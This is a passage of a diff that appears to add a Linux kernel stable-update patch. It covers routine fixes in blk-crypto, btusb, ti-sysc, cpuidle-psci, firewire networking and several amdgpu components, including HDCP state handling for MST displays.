+-		profile->modes_supported[i] = 0xFFFFFFFF;
+-	profile->modes_supported[BLK_ENCRYPTION_MODE_INVALID] = 0;
++		blk_crypto_fallback_profile->modes_supported[i] = 0xFFFFFFFF;
++	blk_crypto_fallback_profile->modes_supported[BLK_ENCRYPTION_MODE_INVALID] = 0;
+ 
+ 	blk_crypto_wq = alloc_workqueue("blk_crypto_wq",
+ 					WQ_UNBOUND | WQ_HIGHPRI |
+@@ -597,7 +605,9 @@ fail_free_keyslots:
+ fail_free_wq:
+ 	destroy_workqueue(blk_crypto_wq);
+ fail_destroy_profile:
+-	blk_crypto_profile_destroy(profile);
++	blk_crypto_profile_destroy(blk_crypto_fallback_profile);
++fail_free_profile:
++	kfree(blk_crypto_fallback_profile);
+ fail_free_bioset:
+ 	bioset_exit(&crypto_bio_split);
+ out:
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index faad19b396d50..d6f405763c56f 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -600,6 +600,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0489, 0xe0d9), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0f5), .driver_info = BTUSB_MEDIATEK |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
+ 	{ USB_DEVICE(0x13d3, 0x3568), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index cae078bffc715..9b7268bae66ab 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -2159,6 +2159,8 @@ static int sysc_reset(struct sysc *ddata)
+ 		sysc_val = sysc_read_sysconfig(ddata);
+ 		sysc_val |= sysc_mask;
+ 		sysc_write(ddata, sysc_offset, sysc_val);
++		/* Flush posted write */
++		sysc_val = sysc_read_sysconfig(ddata);
+ 	}
+ 
+ 	if (ddata->cfg.srst_udelay)
+diff --git a/drivers/cpuidle/cpuidle-psci-domain.c b/drivers/cpuidle/cpuidle-psci-domain.c
+index fe06644725203..f5d4359555d77 100644
+--- a/drivers/cpuidle/cpuidle-psci-domain.c
++++ b/drivers/cpuidle/cpuidle-psci-domain.c
+@@ -117,20 +117,6 @@ static void psci_pd_remove(void)
+ 	}
+ }
+ 
+-static bool psci_pd_try_set_osi_mode(void)
+-{
+-	int ret;
+-
+-	if (!psci_has_osi_support())
+-		return false;
+-
+-	ret = psci_set_osi_mode(true);
+-	if (ret)
+-		return false;
+-
+-	return true;
+-}
+-
+ static void psci_cpuidle_domain_sync_state(struct device *dev)
+ {
+ 	/*
+@@ -149,15 +135,12 @@ static int psci_cpuidle_domain_probe(struct platform_device *pdev)
+ {
+ 	struct device_node *np = pdev->dev.of_node;
+ 	struct device_node *node;
+-	bool use_osi;
++	bool use_osi = psci_has_osi_support();
+ 	int ret = 0, pd_count = 0;
+ 
+ 	if (!np)
+ 		return -ENODEV;
+ 
+-	/* If OSI mode is supported, let's try to enable it. */
+-	use_osi = psci_pd_try_set_osi_mode();
+-
+ 	/*
+ 	 * Parse child nodes for the "#power-domain-cells" property and
+ 	 * initialize a genpd/genpd-of-provider pair when it's found.
+@@ -167,32 +150,37 @@ static int psci_cpuidle_domain_probe(struct platform_device *pdev)
+ 			continue;
+ 
+ 		ret = psci_pd_init(node, use_osi);
+-		if (ret)
+-			goto put_node;
++		if (ret) {
++			of_node_put(node);
++			goto exit;
++		}
+ 
+ 		pd_count++;
+ 	}
+ 
+ 	/* Bail out if not using the hierarchical CPU topology. */
+ 	if (!pd_count)
+-		goto no_pd;
++		return 0;
+ 
+ 	/* Link genpd masters/subdomains to model the CPU topology. */
+ 	ret = dt_idle_pd_init_topology(np);
+ 	if (ret)
+ 		goto remove_pd;
+ 
+-	pr_info("Initialized CPU PM domain topology\n");
++	/* let's try to enable OSI. */
++	ret = psci_set_osi_mode(use_osi);
++	if (ret)
++		goto remove_pd;
++
++	pr_info("Initialized CPU PM domain topology using %s mode\n",
++		use_osi ? "OSI" : "PC");
+ 	return 0;
+ 
+-put_node:
+-	of_node_put(node);
+ remove_pd:
++	dt_idle_pd_remove_topology(np);
+ 	psci_pd_remove();
++exit:
+ 	pr_err("failed to create CPU PM domains ret=%d\n", ret);
+-no_pd:
+-	if (use_osi)
+-		psci_set_osi_mode(false);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c
+index af22be84034bb..a53eacebca339 100644
+--- a/drivers/firewire/net.c
++++ b/drivers/firewire/net.c
+@@ -479,7 +479,7 @@ static int fwnet_finish_incoming_packet(struct net_device *net,
+ 					struct sk_buff *skb, u16 source_node_id,
+ 					bool is_broadcast, u16 ether_type)
+ {
+-	int status;
++	int status, len;
+ 
+ 	switch (ether_type) {
+ 	case ETH_P_ARP:
+@@ -533,13 +533,15 @@ static int fwnet_finish_incoming_packet(struct net_device *net,
+ 		}
+ 		skb->protocol = protocol;
+ 	}
++
++	len = skb->len;
+ 	status = netif_rx(skb);
+ 	if (status == NET_RX_DROP) {
+ 		net->stats.rx_errors++;
+ 		net->stats.rx_dropped++;
+ 	} else {
+ 		net->stats.rx_packets++;
+-		net->stats.rx_bytes += skb->len;
++		net->stats.rx_bytes += len;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index fdb53d4394f30..02a112d00d413 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -185,7 +185,7 @@ static int amdgpu_cs_pass1(struct amdgpu_cs_parser *p,
+ 	uint64_t *chunk_array_user;
+ 	uint64_t *chunk_array;
+ 	uint32_t uf_offset = 0;
+-	unsigned int size;
++	size_t size;
+ 	int ret;
+ 	int i;
+ 
+@@ -1607,15 +1607,15 @@ static int amdgpu_cs_wait_all_fences(struct amdgpu_device *adev,
+ 			continue;
+ 
+ 		r = dma_fence_wait_timeout(fence, true, timeout);
++		if (r > 0 && fence->error)
++			r = fence->error;
++
+ 		dma_fence_put(fence);
+ 		if (r < 0)
+ 			return r;
+ 
+ 		if (r == 0)
+ 			break;
+-
+-		if (fence->error)
+-			return fence->error;
+ 	}
+ 
+ 	memset(wait, 0, sizeof(*wait));
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 773383e660e8c..e6427a00cf6d6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4232,6 +4232,7 @@ int amdgpu_device_suspend(struct drm_device *dev, bool fbcon)
+ 		drm_fb_helper_set_suspend_unlocked(adev_to_drm(adev)->fb_helper, true);
+ 
+ 	cancel_delayed_work_sync(&adev->delayed_init_work);
++	flush_delayed_work(&adev->gfx.gfx_off_delay_work);
+ 
+ 	amdgpu_ras_suspend(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+index ed6878d5b3ce3..418e4c77ceb80 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -501,6 +501,41 @@ int amdgpu_fence_driver_sw_init(struct amdgpu_device *adev)
+ 	return 0;
+ }
+ 
++/**
++ * amdgpu_fence_need_ring_interrupt_restore - helper function to check whether
++ * fence driver interrupts need to be restored.
++ *
++ * @ring: ring that to be checked
++ *
++ * Interrupts for rings that belong to GFX IP don't need to be restored
++ * when the target power state is s0ix.
++ *
++ * Return true if need to restore interrupts, false otherwise.
++ */
++static bool amdgpu_fence_need_ring_interrupt_restore(struct amdgpu_ring *ring)
++{
++	struct amdgpu_device *adev = ring->adev;
++	bool is_gfx_power_domain = false;
++
++	switch (ring->funcs->type) {
++	case AMDGPU_RING_TYPE_SDMA:
++	/* SDMA 5.x+ is part of GFX power domain so it's covered by GFXOFF */
++		if (adev->ip_versions[SDMA0_HWIP][0] >= IP_VERSION(5, 0, 0))
++			is_gfx_power_domain = true;
++		break;
++	case AMDGPU_RING_TYPE_GFX:
++	case AMDGPU_RING_TYPE_COMPUTE:
++	case AMDGPU_RING_TYPE_KIQ:
++	case AMDGPU_RING_TYPE_MES:
++		is_gfx_power_domain = true;
++		break;
++	default:
++		break;
++	}
++
++	return !(adev->in_s0ix && is_gfx_power_domain);
++}
++
+ /**
+  * amdgpu_fence_driver_hw_fini - tear down the fence driver
+  * for all possible rings.
+@@ -529,7 +564,8 @@ void amdgpu_fence_driver_hw_fini(struct amdgpu_device *adev)
+ 			amdgpu_fence_driver_force_completion(ring);
+ 
+ 		if (!drm_dev_is_unplugged(adev_to_drm(adev)) &&
+-		    ring->fence_drv.irq_src)
++		    ring->fence_drv.irq_src &&
++		    amdgpu_fence_need_ring_interrupt_restore(ring))
+ 			amdgpu_irq_put(adev, ring->fence_drv.irq_src,
+ 				       ring->fence_drv.irq_type);
+ 
+@@ -604,7 +640,8 @@ void amdgpu_fence_driver_hw_init(struct amdgpu_device *adev)
+ 			continue;
+ 
+ 		/* enable the interrupt */
+-		if (ring->fence_drv.irq_src)
++		if (ring->fence_drv.irq_src &&
++		    amdgpu_fence_need_ring_interrupt_restore(ring))
+ 			amdgpu_irq_get(adev, ring->fence_drv.irq_src,
+ 				       ring->fence_drv.irq_type);
+ 	}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index b803e785d3aff..23f0067f92e4e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -585,15 +585,8 @@ void amdgpu_gfx_off_ctrl(struct amdgpu_device *adev, bool enable)
+ 
+ 		if (adev->gfx.gfx_off_req_count == 0 &&
+ 		    !adev->gfx.gfx_off_state) {
+-			/* If going to s2idle, no need to wait */
+-			if (adev->in_s0ix) {
+-				if (!amdgpu_dpm_set_powergating_by_smu(adev,
+-						AMD_IP_BLOCK_TYPE_GFX, true))
+-					adev->gfx.gfx_off_state = true;
+-			} else {
+-				schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
++			schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
+ 					      delay);
+-			}
+ 		}
+ 	} else {
+ 		if (adev->gfx.gfx_off_req_count == 0) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+index ca5dc51600fac..9efbc0f7c6bdf 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+@@ -160,7 +160,6 @@ void amdgpu_irq_disable_all(struct amdgpu_device *adev)
+ 				continue;
+ 
+ 			for (k = 0; k < src->num_types; ++k) {
+-				atomic_set(&src->enabled_types[k], 0);
+ 				r = src->funcs->set(adev, src, k,
+ 						    AMDGPU_IRQ_STATE_DISABLE);
+ 				if (r)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index eecbd8eeb1f5a..8764ff7ed97e0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -514,6 +514,8 @@ static int psp_sw_fini(void *handle)
+ 	kfree(cmd);
+ 	cmd = NULL;
+ 
++	psp_free_shared_bufs(psp);
++
+ 	if (psp->km_ring.ring_mem)
+ 		amdgpu_bo_free_kernel(&adev->firmware.rbuf,
+ 				      &psp->km_ring.ring_mem_mc_addr,
+@@ -2673,8 +2675,6 @@ static int psp_hw_fini(void *handle)
+ 
+ 	psp_ring_destroy(psp, PSP_RING_TYPE__KM);
+ 
+-	psp_free_shared_bufs(psp);
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
+index d3558c34d406c..296b2d5976af7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
+@@ -361,6 +361,8 @@ void amdgpu_ring_fini(struct amdgpu_ring *ring)
+ 		amdgpu_bo_free_kernel(&ring->ring_obj,
+ 				      &ring->gpu_addr,
+ 				      (void **)&ring->ring);
++	} else {
++		kfree(ring->fence_drv.fences);
+ 	}
+ 
+ 	dma_fence_put(ring->vmid_wait);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+index ec938a1a50621..4c661e024e13d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+@@ -1352,6 +1352,7 @@ struct amdgpu_bo_va *amdgpu_vm_bo_add(struct amdgpu_device *adev,
+ 	amdgpu_vm_bo_base_init(&bo_va->base, vm, bo);
+ 
+ 	bo_va->ref_count = 1;
++	bo_va->last_pt_update = dma_fence_get_stub();
+ 	INIT_LIST_HEAD(&bo_va->valids);
+ 	INIT_LIST_HEAD(&bo_va->invalids);
+ 
+@@ -2073,7 +2074,8 @@ int amdgpu_vm_init(struct amdgpu_device *adev, struct amdgpu_vm *vm)
+ 		vm->update_funcs = &amdgpu_vm_cpu_funcs;
+ 	else
+ 		vm->update_funcs = &amdgpu_vm_sdma_funcs;
+-	vm->last_update = NULL;
++
++	vm->last_update = dma_fence_get_stub();
+ 	vm->last_unlocked = dma_fence_get_stub();
+ 	vm->last_tlb_flush = dma_fence_get_stub();
+ 
+@@ -2198,7 +2200,7 @@ int amdgpu_vm_make_compute(struct amdgpu_device *adev, struct amdgpu_vm *vm)
+ 		goto unreserve_bo;
+ 
+ 	dma_fence_put(vm->last_update);
+-	vm->last_update = NULL;
++	vm->last_update = dma_fence_get_stub();
+ 	vm->is_compute_context = true;
+ 
+ 	/* Free the shadow bo for compute VM */
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 9f718b98da1f7..249b269e2cc53 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -7397,27 +7397,55 @@ is_scaling_state_different(const struct dm_connector_state *dm_state,
+ }
+ 
+ #ifdef CONFIG_DRM_AMD_DC_HDCP
+-static bool is_content_protection_different(struct drm_connector_state *state,
+-					    const struct drm_connector_state *old_state,
+-					    const struct drm_connector *connector, struct hdcp_workqueue *hdcp_w)
++static bool is_content_protection_different(struct drm_crtc_state *new_crtc_state,
++					    struct drm_crtc_state *old_crtc_state,
++					    struct drm_connector_state *new_conn_state,
++					    struct drm_connector_state *old_conn_state,
++					    const struct drm_connector *connector,
++					    struct hdcp_workqueue *hdcp_w)
+ {
+ 	struct amdgpu_dm_connector *aconnector = to_amdgpu_dm_connector(connector);
+ 	struct dm_connector_state *dm_con_state = to_dm_connector_state(connector->state);
+ 
+-	/* Handle: Type0/1 change */
+-	if (old_state->hdcp_content_type != state->hdcp_content_type &&
+-	    state->content_protection != DRM_MODE_CONTENT_PROTECTION_UNDESIRED) {
+-		state->content_protection = DRM_MODE_CONTENT_PROTECTION_DESIRED;
++	pr_debug("[HDCP_DM] connector->index: %x connect_status: %x dpms: %x\n",
++		connector->index, connector->status, connector->dpms);
++	pr_debug("[HDCP_DM] state protection old: %x new: %x\n",
++		old_conn_state->content_protection, new_conn_state->content_protection);
++
++	if (old_crtc_state)
++		pr_debug("[HDCP_DM] old crtc en: %x a: %x m: %x a-chg: %x c-chg: %x\n",
++		old_crtc_state->enable,
++		old_crtc_state->active,
++		old_crtc_state->mode_changed,
++		old_crtc_state->active_changed,
++		old_crtc_state->connectors_changed);
++
++	if (new_crtc_state)
++		pr_debug("[HDCP_DM] NEW crtc en: %x a: %x m: %x a-chg: %x c-chg: %x\n",
++		new_crtc_state->enable,
++		new_crtc_state->active,
++		new_crtc_state->mode_changed,
++		new_crtc_state->active_changed,
++		new_crtc_state->connectors_changed);
++
++	/* hdcp content type change */
++	if (old_conn_state->hdcp_content_type != new_conn_state->hdcp_content_type &&
++	    new_conn_state->content_protection != DRM_MODE_CONTENT_PROTECTION_UNDESIRED) {
++		new_conn_state->content_protection = DRM_MODE_CONTENT_PROTECTION_DESIRED;
++		pr_debug("[HDCP_DM] Type0/1 change %s :true\n", __func__);
+ 		return true;
+ 	}
+ 
+-	/* CP is being re enabled, ignore this
+-	 *
+-	 * Handles:	ENABLED -> DESIRED
+-	 */
+-	if (old_state->content_protection == DRM_MODE_CONTENT_PROTECTION_ENABLED &&
+-	    state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED) {
+-		state->content_protection = DRM_MODE_CONTENT_PROTECTION_ENABLED;
++	/* CP is being re enabled, ignore this */
++	if (old_conn_state->content_protection == DRM_MODE_CONTENT_PROTECTION_ENABLED &&
++	    new_conn_state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED) {
++		if (new_crtc_state && new_crtc_state->mode_changed) {
++			new_conn_state->content_protection = DRM_MODE_CONTENT_PROTECTION_DESIRED;
++			pr_debug("[HDCP_DM] ENABLED->DESIRED & mode_changed %s :true\n", __func__);
++			return true;
++		};
++		new_conn_state->content_protection = DRM_MODE_CONTENT_PROTECTION_ENABLED;
++		pr_debug("[HDCP_DM] ENABLED -> DESIRED %s :false\n", __func__);
+ 		return false;
+ 	}
+ 
+@@ -7425,9 +7453,9 @@ static bool is_content_protection_different(struct drm_connector_state *state,
+ 	 *
+ 	 * Handles:	UNDESIRED -> ENABLED
+ 	 */
+-	if (old_state->content_protection == DRM_MODE_CONTENT_PROTECTION_UNDESIRED &&
+-	    state->content_protection == DRM_MODE_CONTENT_PROTECTION_ENABLED)
+-		state->content_protection = DRM_MODE_CONTENT_PROTECTION_DESIRED;
++	if (old_conn_state->content_protection == DRM_MODE_CONTENT_PROTECTION_UNDESIRED &&
++	    new_conn_state->content_protection == DRM_MODE_CONTENT_PROTECTION_ENABLED)
++		new_conn_state->content_protection = DRM_MODE_CONTENT_PROTECTION_DESIRED;
+ 
+ 	/* Stream removed and re-enabled
+ 	 *
+@@ -7437,10 +7465,12 @@ static bool is_content_protection_different(struct drm_connector_state *state,
+ 	 *
+ 	 * Handles:	DESIRED -> DESIRED (Special case)
+ 	 */
+-	if (!(old_state->crtc && old_state->crtc->enabled) &&
+-		state->crtc && state->crtc->enabled &&
++	if (!(old_conn_state->crtc && old_conn_state->crtc->enabled) &&
++		new_conn_state->crtc && new_conn_state->crtc->enabled &&
+ 		connector->state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED) {
+ 		dm_con_state->update_hdcp = false;
++		pr_debug("[HDCP_DM] DESIRED->DESIRED (Stream removed and re-enabled) %s :true\n",
++			__func__);
+ 		return true;
+ 	}
+ 
+@@ -7452,35 +7482,42 @@ static bool is_content_protection_different(struct drm_connector_state *state,
+ 	 *
+ 	 * Handles:	DESIRED -> DESIRED (Special case)
+ 	 */
+-	if (dm_con_state->update_hdcp && state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED &&
+-	    connector->dpms == DRM_MODE_DPMS_ON && aconnector->dc_sink != NULL) {
++	if (dm_con_state->update_hdcp &&
++	new_conn_state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED &&
++	connector->dpms == DRM_MODE_DPMS_ON && aconnector->dc_sink != NULL) {
+ 		dm_con_state->update_hdcp = false;
++		pr_debug("[HDCP_DM] DESIRED->DESIRED (Hot-plug, headless s3, dpms) %s :true\n",
++			__func__);
+ 		return true;
+ 	}
+ 
+-	/*
+-	 * Handles:	UNDESIRED -> UNDESIRED
+-	 *		DESIRED -> DESIRED
+-	 *		ENABLED -> ENABLED
+-	 */
+-	if (old_state->content_protection == state->content_protection)
++	if (old_conn_state->content_protection == new_conn_state->content_protection) {
++		if (new_conn_state->content_protection >= DRM_MODE_CONTENT_PROTECTION_DESIRED) {
++			if (new_crtc_state && new_crtc_state->mode_changed) {
++				pr_debug("[HDCP_DM] DESIRED->DESIRED or ENABLE->ENABLE mode_change %s :true\n",
++					__func__);
++				return true;
++			};
++			pr_debug("[HDCP_DM] DESIRED->DESIRED & ENABLE->ENABLE %s :false\n",
++				__func__);
++			return false;
++		};
++
++		pr_debug("[HDCP_DM] UNDESIRED->UNDESIRED %s :false\n", __func__);
+ 		return false;
++	}
+ 
+-	/*
+-	 * Handles:	UNDESIRED -> DESIRED
+-	 *		DESIRED -> UNDESIRED
+-	 *		ENABLED -> UNDESIRED
+-	 */
+-	if (state->content_protection != DRM_MODE_CONTENT_PROTECTION_ENABLED)
++	if (new_conn_state->content_protection != DRM_MODE_CONTENT_PROTECTION_ENABLED) {
++		pr_debug("[HDCP_DM] UNDESIRED->DESIRED or DESIRED->UNDESIRED or ENABLED->UNDESIRED %s :true\n",
++			__func__);
+ 		return true;
++	}
+ 
+-	/*
+-	 * Handles:	DESIRED -> ENABLED
+-	 */
++	pr_debug("[HDCP_DM] DESIRED->ENABLED %s :false\n", __func__);
+ 	return false;
+ }
+-
+ #endif
++
+ static void remove_stream(struct amdgpu_device *adev,
+ 			  struct amdgpu_crtc *acrtc,
+ 			  struct dc_stream_state *stream)
+@@ -8335,10 +8372,67 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 		struct amdgpu_crtc *acrtc = to_amdgpu_crtc(dm_new_con_state->base.crtc);
+ 		struct amdgpu_dm_connector *aconnector = to_amdgpu_dm_connector(connector);
+ 
++		if (!adev->dm.hdcp_workqueue)
++			continue;
++
++		pr_debug("[HDCP_DM] -------------- i : %x ----------\n", i);
++
++		if (!connector)
++			continue;
++
++		pr_debug("[HDCP_DM] connector->index: %x connect_status: %x dpms: %x\n",
++			connector->index, connector->status, connector->dpms);
++		pr_debug("[HDCP_DM] state protection old: %x new: %x\n",
++			old_con_state->content_protection, new_con_state->content_protection);
++
++		if (aconnector->dc_sink) {
++			if (aconnector->dc_sink->sink_signal != SIGNAL_TYPE_VIRTUAL &&
++				aconnector->dc_sink->sink_signal != SIGNAL_TYPE_NONE) {
++				pr_debug("[HDCP_DM] pipe_ctx dispname=%s\n",
++				aconnector->dc_sink->edid_caps.display_name);
++			}
++		}
++
+ 		new_crtc_state = NULL;
++		old_crtc_state = NULL;
+ 
+-		if (acrtc)
++		if (acrtc) {
+ 			new_crtc_state = drm_atomic_get_new_crtc_state(state, &acrtc->base);
++			old_crtc_state = drm_atomic_get_old_crtc_state(state, &acrtc->base);
++		}
++
++		if (old_crtc_state)
++			pr_debug("old crtc en: %x a: %x m: %x a-chg: %x c-chg: %x\n",
++			old_crtc_state->enable,
++			old_crtc_state->active,
++			old_crtc_state->mode_changed,
++			old_crtc_state->active_changed,
++			old_crtc_state->connectors_changed);
++
++		if (new_crtc_state)
++			pr_debug("NEW crtc en: %x a: %x m: %x a-chg: %x c-chg: %x\n",
++			new_crtc_state->enable,
++			new_crtc_state->active,
++			new_crtc_state->mode_changed,
++			new_crtc_state->active_changed,
++			new_crtc_state->connectors_changed);
++	}
++
++	for_each_oldnew_connector_in_state(state, connector, old_con_state, new_con_state, i) {
++		struct dm_connector_state *dm_new_con_state = to_dm_connector_state(new_con_state);
++		struct amdgpu_crtc *acrtc = to_amdgpu_crtc(dm_new_con_state->base.crtc);
++		struct amdgpu_dm_connector *aconnector = to_amdgpu_dm_connector(connector);
++
++		if (!adev->dm.hdcp_workqueue)
++			continue;
++
++		new_crtc_state = NULL;
++		old_crtc_state = NULL;
++
++		if (acrtc) {
++			new_crtc_state = drm_atomic_get_new_crtc_state(state, &acrtc->base);
++			old_crtc_state = drm_atomic_get_old_crtc_state(state, &acrtc->base);
++		}
+ 
+ 		dm_new_crtc_state = to_dm_crtc_state(new_crtc_state);
+ 
+@@ -8350,11 +8444,44 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 			continue;
+ 		}
+ 
+-		if (is_content_protection_different(new_con_state, old_con_state, connector, adev->dm.hdcp_workqueue))
++		if (is_content_protection_different(new_crtc_state, old_crtc_state, new_con_state,
++											old_con_state, connector, adev->dm.hdcp_workqueue)) {
++			/* when display is unplugged from mst hub, connctor will
++			 * be destroyed within dm_dp_mst_connector_destroy. connector
++			 * hdcp perperties, like type, undesired, desired, enabled,
++			 * will be lost. So, save hdcp properties into hdcp_work within
++			 * amdgpu_dm_atomic_commit_tail. if the same display is
++			 * plugged back with same display index, its hdcp properties
++			 * will be retrieved from hdcp_work within dm_dp_mst_get_modes
++			 */
++
++			bool enable_encryption = false;
++
++			if (new_con_state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED)
++				enable_encryption = true;
++
++			if (aconnector->dc_link && aconnector->dc_sink &&
++				aconnector->dc_link->type == dc_connection_mst_branch) {
++				struct hdcp_workqueue *hdcp_work = adev->dm.hdcp_workqueue;
++				struct hdcp_workqueue *hdcp_w =
++					&hdcp_work[aconnector->dc_link->link_index];
++
++				hdcp_w->hdcp_content_type[connector->index] =
++					new_con_state->hdcp_content_type;
++				hdcp_w->content_protection[connector->index] =
++					new_con_state->content_protection;
++			}
++
++			if (new_crtc_state && new_crtc_state->mode_changed &&
++				new_con_state->content_protection >= DRM_MODE_CONTENT_PROTECTION_DESIRED)
++				enable_encryption = true;
++
++			DRM_INFO("[HDCP_DM] hdcp_update_display enable_encryption = %x\n", enable_encryption);
++
+ 			hdcp_update_display(
+ 				adev->dm.hdcp_workqueue, aconnector->dc_link->link_index, aconnector,
+-				new_con_state->hdcp_content_type,
+-				new_con_state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED);
++				new_con_state->hdcp_content_type, enable_encryption);
++		}
+ 	}
+ #endif
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.h
+index 09294ff122fea..bbbf7d0eff82f 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.h
+@@ -52,6 +52,20 @@ struct hdcp_workqueue {
+ 	struct mod_hdcp_link link;
+ 
+ 	enum mod_hdcp_encryption_status encryption_status;
++
++	/* when display is unplugged from mst hub, connctor will be
++	 * destroyed within dm_dp_mst_connector_destroy. connector
++	 * hdcp perperties, like type, undesired, desired, enabled,
++	 * will be lost. So, save hdcp properties into hdcp_work within
++	 * amdgpu_dm_atomic_commit_tail. if the same display is
++	 * plugged back with same display index, its hdcp properties
++	 * will be retrieved from hdcp_work within dm_dp_mst_get_modes
++	 */
++	/* un-desired, desired, enabled */
++	unsigned int content_protection[AMDGPU_DM_MAX_DISPLAY_INDEX];
++	/* hdcp1.x, hdcp2.x */
++	unsigned int hdcp_content_type[AMDGPU_DM_MAX_DISPLAY_INDEX];
++
+ 	uint8_t max_link;
+ 
+ 	uint8_t *srm;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index d07e1053b36b3..a9ddff774a978 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -32,6 +32,10 @@
+ #include "amdgpu_dm.h"
+ #include "amdgpu_dm_mst_types.h"
+ 
++#ifdef CONFIG_DRM_AMD_DC_HDCP
++#include "amdgpu_dm_hdcp.h"
++#endif
++
+ #include "dc.h"
+ #include "dm_helpers.h"
+ 
+@@ -363,6 +367,32 @@ static int dm_dp_mst_get_modes(struct drm_connector *connector)
+ 		/* dc_link_add_remote_sink returns a new reference */
+ 		aconnector->dc_sink = dc_sink;
+ 
++		/* when display is unplugged from mst hub, connctor will be
++		 * destroyed within dm_dp_mst_connector_destroy. connector
++		 * hdcp perperties, like type, undesired, desired, enabled,
++		 * will be lost. So, save hdcp properties into hdcp_work within
++		 * amdgpu_dm_atomic_commit_tail. if the same display is
++		 * plugged back with same display index, its hdcp properties
++		 * will be retrieved from hdcp_work within dm_dp_mst_get_modes
++		 */
++#ifdef CONFIG_DRM_AMD_DC_HDCP
++		if (aconnector->dc_sink && connector->state) {
++			struct drm_device *dev = connector->dev;
++			struct amdgpu_device *adev = drm_to_adev(dev);
++
++			if (adev->dm.hdcp_workqueue) {
++				struct hdcp_workqueue *hdcp_work = adev->dm.hdcp_workqueue;
++				struct hdcp_workqueue *hdcp_w =
++					&hdcp_work[aconnector->dc_link->link_index];
++
++				connector->state->hdcp_content_type =
++				hdcp_w->hdcp_content_type[connector->index];
++				connector->state->content_protection =
++				hdcp_w->content_protection[connector->index];
++			}
++		}
++#endif
++
+ 		if (aconnector->dc_sink) {
